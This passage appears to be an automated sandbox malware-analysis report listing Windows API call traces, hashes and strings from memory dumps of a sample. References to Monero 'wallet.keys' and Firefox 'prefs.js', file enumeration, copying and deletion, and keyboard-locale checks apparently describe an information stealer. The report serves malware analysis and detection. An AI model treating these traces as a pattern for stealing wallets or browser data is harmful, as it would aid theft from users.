                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                          • Instruction ID: ee108d88a1ae6b44f1647c096388b9f9723aa9c38258b81054f953efd39fb677
                          • Opcode Fuzzy Hash: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                          • Instruction Fuzzy Hash: FB5127B6900218ABCB24EBB0DC85FEE777CBB84301F4046C8B65997144DF75AB858F55
                          APIs
                          • wsprintfA.USER32 ref: 0091ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0091ED55
                          • StrCmpCA.SHLWAPI(?,00931538), ref: 0091EDAB
                          • StrCmpCA.SHLWAPI(?,0093153C), ref: 0091EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0091F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                          • Instruction ID: 8248ea1231aed4d6196efab5492bfeade24a13947649b7e75253572a90e47509
                          • Opcode Fuzzy Hash: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                          • Instruction Fuzzy Hash: CBE1AD769111289BEB55FB60EC52FEE733CAF94300F404599F50A62096EE306F8ACF56
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009315B8,00930D96), ref: 0091F71E
                          • StrCmpCA.SHLWAPI(?,009315BC), ref: 0091F76F
                          • StrCmpCA.SHLWAPI(?,009315C0), ref: 0091F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0091FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                          • Instruction ID: 32fa09c4ca2af7fb5d1592b08aaddd1a455d316bdb7b60124372662fca917c7c
                          • Opcode Fuzzy Hash: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                          • Instruction Fuzzy Hash: 7BB11672A001189BDB24FF60EC96BED7379AFD4300F4085A8E50A97195EF345B49CF96
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0093510C,?,?,?,009351B4,?,?,00000000,?,00000000), ref: 00911923
                          • StrCmpCA.SHLWAPI(?,0093525C), ref: 00911973
                          • StrCmpCA.SHLWAPI(?,00935304), ref: 00911989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00911D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00911DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00911E20
                          • FindClose.KERNEL32(000000FF), ref: 00911E32
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                          • Instruction ID: 5670f4f5190b1fa7a48d5b19c578197d06b7c33ecf65bbc4d69117e48106e818
                          • Opcode Fuzzy Hash: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                          • Instruction Fuzzy Hash: 0212E072911128ABDB19FB60EC96FEE7378AF94300F404599F50A62095EF306F89CF95
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00930C2E), ref: 0091DE5E
                          • StrCmpCA.SHLWAPI(?,009314C8), ref: 0091DEAE
                          • StrCmpCA.SHLWAPI(?,009314CC), ref: 0091DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0091E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                          • Instruction ID: ba4c98e8c997f210e7124965bd3c756d83015d5315908e333248bf131f716f8b
                          • Opcode Fuzzy Hash: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                          • Instruction Fuzzy Hash: 44F18E729151289BDB15EB60EC95BEE7338BF98300F4045D9E41A62095EF306F8ACF65
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009314B0,00930C2A), ref: 0091DAEB
                          • StrCmpCA.SHLWAPI(?,009314B4), ref: 0091DB33
                          • StrCmpCA.SHLWAPI(?,009314B8), ref: 0091DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0091DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                          • Instruction ID: 57f5640c1af0da16150a8f3fc3a4edf0555256e8876c92bc0c2554332dbad02a
                          • Opcode Fuzzy Hash: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                          • Instruction Fuzzy Hash: D6910573A00118ABCB14FB70FC56BED737DABC8300F408658F94A96195EE349B59CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4A+~$?\v_$Wg.$X7_U$pk{?$zCj:$qZf$^u
                          • API String ID: 0-903456993
                          • Opcode ID: 44b42ca738b520854632d733fb80238cbf3ecc9f5a3d9e15be55fd3205d637d9
                          • Instruction ID: 9ca43fd22a24a7b574e78568fd99cc065a9015a3dcec1a926b5346023027d2aa
                          • Opcode Fuzzy Hash: 44b42ca738b520854632d733fb80238cbf3ecc9f5a3d9e15be55fd3205d637d9
                          • Instruction Fuzzy Hash: 94B25AF3A0C2149FE3046E2DEC85B7ABBD9EF94720F1A463DEAC4C3744E93558058696
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,009305AF), ref: 00927BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00927BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00927C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927C62
                          • LocalFree.KERNEL32(00000000), ref: 00927D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                          • Instruction ID: 398e2ec9b04ff176e42dcae4853fbadaf5df8f76693e2106687c63a0fc4e1e00
                          • Opcode Fuzzy Hash: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                          • Instruction Fuzzy Hash: CB414171941228ABDB24DB94EC99BEDB778FF84700F2041D9E10972295DB342F85CFA1
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00930D73), ref: 0091E4A2
                          • StrCmpCA.SHLWAPI(?,009314F8), ref: 0091E4F2
                          • StrCmpCA.SHLWAPI(?,009314FC), ref: 0091E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                          • Instruction ID: 734a2fe75a4d1c3eef98c18b9514a3cf1157f3f98e083bad8a16c702e8dd3441
                          • Opcode Fuzzy Hash: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                          • Instruction Fuzzy Hash: EC1221739111289BDB18FB60EC96BED7379AFD4300F4045A8F50A66095EE306F89CF96
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2/|}$Uj'n$[x??$jN${%>
                          • API String ID: 0-3800172134
                          • Opcode ID: adda45f2d7e211389063918ab9998da79f8f78658fbdbc01ae52f9b338f79a09
                          • Instruction ID: 9219a7b68b726ad14bd3dc688c50cf470072f99ec3357afe9d1d286bcf95abf9
                          • Opcode Fuzzy Hash: adda45f2d7e211389063918ab9998da79f8f78658fbdbc01ae52f9b338f79a09
                          • Instruction Fuzzy Hash: C5B217F3A0C2149FE3046E2DEC8567ABBE9EFD4720F1A893DE6C4C7744E93558058692
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                          • lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                          • lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                          • lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
